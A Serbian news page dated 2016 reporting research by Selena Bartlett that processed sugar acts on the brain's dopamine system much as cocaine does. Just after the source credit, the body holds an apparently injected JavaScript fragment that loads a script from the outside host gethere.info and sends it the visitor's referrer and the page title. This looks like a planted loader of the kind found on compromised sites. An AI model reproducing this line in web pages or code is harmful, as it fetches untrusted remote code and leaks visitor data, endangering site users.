Život
13.04.2016. 12:28
ekspres

ZAVISNOST: Šećer na mozak deluje kao kokain!

Ekspres.net
Izvor: Ekspres.net

Najnovije naučno istraživanje potvrdilo je da bi ljudi, koji su zavisni od šećera, trebalo da budu lečeni na isti način kao zavisnici od droga.

Istraživanje koje su sproveli naučnici sa Tehnološkog univerziteta u Kvinslendu, pokazalo je da konzumiranje industrijski prerađenog šećera utiče na povećanje nivoa dopamina na sličan način na koji to čine droge poput kokaina.

Takođe je ustanovljeno da dugotrajno konzumiranje šećera utiče na smanjenje ove supstance, što znači da su ljudi vremenom primorani da unose se više šećera kako bi postigli isti stepen zadovoljstva, odnosno izbegli blaži oblik depresije.

Dugotrajna izloženost organizma šećeru takođe dovodi do nastanka poremećaja u ishrani i različitih promena u ponašanju pojedinaca, piše "Independent".

Profesor Selena Bartlet, neurolog sa Instituta za zdravlje i biomedicinske inovacije u Kvinslendu, istakla je da istraživanje ukazuje na to da bi zavisnike od šećera trebalo lečiti lekovima protiv nikotinske zavisnosti.

- Dokazano je da povećani unos prerađenih šećera direktno utiče na povećanje telesne težine i nivo dopamina (utiče na centre za zadovoljstvo i nagrađivanje u mozgu) na sličan način na koji to čine duvan, kokain i morfijum - rekla je Bartlet.

- Eksperimenti sprovedeni na životinjama takođe su pokazali da su jedinke, koje su redovno konzumirale prerađeni šećer, kasnije bile sklonije prejedanju i suočavanju sa negativnim neurološkim i psihijatrijskim posledicama po raspoloženje i motivaciju - zaključila je Bartlet.

 

(b92.net)s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
17°C
03.06.2023.
Beograd
Wind
PM2.5
5µg/m3
PM10
6µg/m3
UV
UV indeks
1
AQI indeks
1

Oni su ponos Srbije

Vidi sve

Najnovije

Vidi sve

Iz drugačijeg ugla

Vidi sve